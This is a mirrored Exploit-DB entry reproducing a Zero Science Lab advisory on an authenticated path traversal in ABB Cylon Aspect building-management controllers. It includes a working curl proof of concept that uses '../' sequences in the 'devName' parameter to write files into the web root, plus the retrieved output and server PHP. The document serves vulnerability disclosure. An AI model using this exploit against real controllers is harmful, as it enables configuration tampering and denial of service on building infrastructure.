bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/hardware/52252.txt
Exploit-DB 9ddf81331a DB: 2025-04-18 
10 changes to exploits/shellcodes/ghdb

TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)

Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)

Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation

compop.ca 3.5.3 - Arbitrary code Execution

Usermin 2.100 - Username Enumeration

ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution

ABB Cylon Aspect 3.08.02 (ethernetUpdate.php)  - Authenticated Path Traversal

AnyDesk 9.0.1 - Unquoted Service Path
2025-04-18 00:16:31 +00:00

135 lines
No EOL
6 KiB
Text
Raw Permalink Blame History

# Exploit Title: ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon controller suffers from an authenticated path traversal
vulnerability. This can be exploited through the 'devName' POST parameter in
the ethernetUpdate.php script to write partially controlled content, such as
IP address values, into arbitrary file paths, potentially leading to configuration
tampering and system compromise including denial of service scenario through
ethernet configuration backup file overwrite.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5890
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5890.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/ethernetUpdate.php \
> -d "listFile=%2Fusr%2Flocal%2Faam%2Fetc%2Feth0\
> &devName=../../../../../../../home/MIX_CMIX/htmlroot/testingus\
> &useDHCP=1\
> &dhcp=YES\
> &IP1=192&IP2=168&IP3=73&IP4=31\
> &SM1=255&SM2=255&SM3=255&SM4=0\
> &N1=192&N2=168&N3=1&N4=0\
> &B1=192&B2=168&B3=1&B4=255\
> &GW1=192&GW2=168&GW3=1&GW4=254\
> &DNSA1=&DNSA2=&DNSA3=&DNSA4=\
> &DNSB1=&DNSB2=&DNSB3=&DNSB4=\
> &submitTime=Submit" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
<title>Web Server Configuration</title>
<link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>
<body class="workscroll" topmargin="0" leftmargin="0" scroll="No">
<h1>Ethernet Settings</h1>
<p class="subtitle">
Ethernet settings have been successfully updated.<br>Please supply MAC address below to your Network Administrator in order to determine new IP Address.<br><b>MAC Address: </b></p>
<iframe src="ethernetUpdateRun.php" style="visibility:hidden;"/>
</form>
<hr>
</body>
</html>
$ curl http://192.168.73.31/testingus.bak
ONBOOT=yes
DHCP=YES
IPADDR=192.168.73.31
NETMASK=255.255.255.0
GATEWAY=192.168.1.254
NETWORK=192.168.1.0
BROADCAST=192.168.1.255
DNS1=
DNS2=
$ cat -n /home/MIX_CMIX/htmlroot/ethernetUpdateRun.php
1 <?php
2 //---------Begin Authorization-------------
3 require_once 'validate/validateHeader.php';
4 //--------End Authorization----------------
5 include "lib/configParameter.php";
6 $lookupLog = "config/configfile";
7 $listFile = trim(obtainValue($lookupLog, "SHELL"));
8 $command = $listFile . "net.sh";
9 $sudo = trim(obtainValue($lookupLog, "SUDO"));
10 logWarning("Ethernet Settings modified");
11 exec($sudo . " " . $listFile . "net.sh");
12 exit();
13
14 ?>
Reference in a new issue View git blame Copy permalink